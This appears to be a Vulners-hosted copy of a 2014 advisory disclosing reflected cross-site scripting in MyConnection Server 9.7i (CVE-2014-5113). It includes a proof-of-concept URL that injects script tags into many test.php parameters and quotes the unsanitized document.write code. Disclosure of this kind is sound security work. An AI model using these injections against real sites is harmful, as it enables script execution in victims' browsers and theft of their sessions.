Lucene search
K

MyConnection Server (MCS) 9.7i Cross Site Scripting Vulnerability

🗓️ 15 Aug 2014 00:00:00Reported by 1N3Type 
zdt
 zdt
🔗 0day.today👁 42 Views

MyConnection Server (MCS) 9.7i Cross Site Scripting Vulnerability affecting test.ph

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-5113
28 Jul 201415:00
cve
Cvelist
CVE-2014-5113
28 Jul 201415:00
cvelist
EUVD
EUVD-2014-5011
7 Oct 202500:30
euvd
NVD
CVE-2014-5113
28 Jul 201415:55
nvd
Prion
Cross site scripting
28 Jul 201415:55
prion
RedhatCVE
CVE-2014-5113
22 May 202504:12
redhatcve
Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vender Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection
testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a
failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to
inject client side javascript to run in the context of the user browsing the website. Several parameters including
testtype, ver, cm, map, lines, duration and others appear to be vulnerable.

POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom
.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1">&l
t;script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><
script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><scri
pt>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><s
cript>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1&qu
ot;><script>alert(1);</script>

VULNERABLE CODE:

* Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to
reflective XSS.

<td valign="top" width="30%"><b>Current
Settings</b>
<br>
<br>
<b>VoIP Lines Simulated</b>:
<script type="text/javascript"> document.write(voiplines); </script><br>
<b>Test Length</b>:
<script type="text/javascript"> document.write(testlength); </script><br>
<b>Codec</b>:
<script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
else { document.write(nameg729); }
</script><br>
</td>
<td align="left" width="70%">
<p align="center">
<script>

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Aug 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00334
42